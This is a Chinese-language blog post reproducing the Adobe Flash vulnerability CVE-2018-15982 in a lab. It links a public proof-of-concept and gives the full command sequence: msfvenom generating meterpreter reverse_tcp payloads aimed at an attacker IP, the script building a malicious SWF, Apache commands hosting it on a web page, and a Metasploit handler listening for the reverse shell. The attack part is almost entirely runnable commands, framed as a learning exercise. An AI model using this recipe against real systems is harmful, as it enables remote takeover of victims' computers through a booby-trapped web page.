CVE-2018-15982漏洞复现

作者: 泽英君 | 来源:发表于2019-02-10 23:45 被阅读70次

    开篇闲聊:

    自从上次写完CVE-2018-4878后我就在想,有没有能简单粗暴干掉我的Win10主机的办法,找了半天,果然没找到(说不出是开心还是悲伤),但是找到了这个最接近最新版本的Flash的漏洞。

    漏洞概述:

    受影响的版本:

    Adobe Flash Player <= 31.0.0.153

    Adobe Flash Player Installer<= 31.0.0.108

    不受影响的版本:

    Adobe Flash Player 32.0.0.101

    Adobe Flash Player Installer 31.0.0.122

    作者的版本刚好是最底下的那个.....

    不过我仔细看了它的起源经过:

    2018年11月29日,360高级威胁应对团队在全球范围内第一时间发现一起针对俄罗斯的APT攻击行动,通过一份俄文内容的医院员工问卷文档,携带最新的Flash 0day漏洞和具有自毁功能的专属木马程序,该漏洞(CVE-2018-15982)允许攻击者恶意制作的Flash对象在受害者的计算机上执行代码,从而获取对系统命令行的访问权限。

    看起来是个很时髦的漏洞,来开始吧!

    复现环境:

    Kail linux

    Win7 + Flash 28(为啥不选最新版本呢?因为这个是做完4878剩下的环境,懒得再下新版了哈哈)

    POC: https://github.com/B1eed/VulRec/tree/master/CVE-2018-15982

    复现过程:

    1、创建payload程序

    root@wuyou:~/CVE-2018-15982# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.190.134 LPORT=4444 -f raw > 64.bin

    root@wuyou:~/CVE-2018-15982# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.190.134 LPORT=4444 -f raw > 86.bin

    2、生成文件视频文件和网页

    root@wuyou:~/CVE-2018-15982# python CVE-2018-15982.py -i 86.bin -I 64.bin -o exploit.swf

    3、开启Apache服务

    root@wuyou:~/CVE-2018-4878# service apache2 start

    root@wuyou:~/CVE-2018-4878# cp index.html /var/www/html/index.html

    root@wuyou:~/CVE-2018-4878# cp exploit.swf /var/www/html/exploit.swf

    4、开始监听

    root@wuyou:~# msfconsole

    msf > use exploit/multi/handler

    msf exploit(handler) > set payload windows/meterpreter/reverse_tcp

    msf exploit(handler) > set lhost 192.168.190.134

    msf exploit(handler) > set lport 4444

    msf exploit(handler) > exploit

    5、在靶机打开网页

    192.168.190.134/index.html

    页面内容

    这是渗透机已经成功获取到Session了!

    相关文章

      网友评论

        本文标题:CVE-2018-15982漏洞复现

        本文链接:https://www.haomeiwen.com/subject/fmkfeqtx.html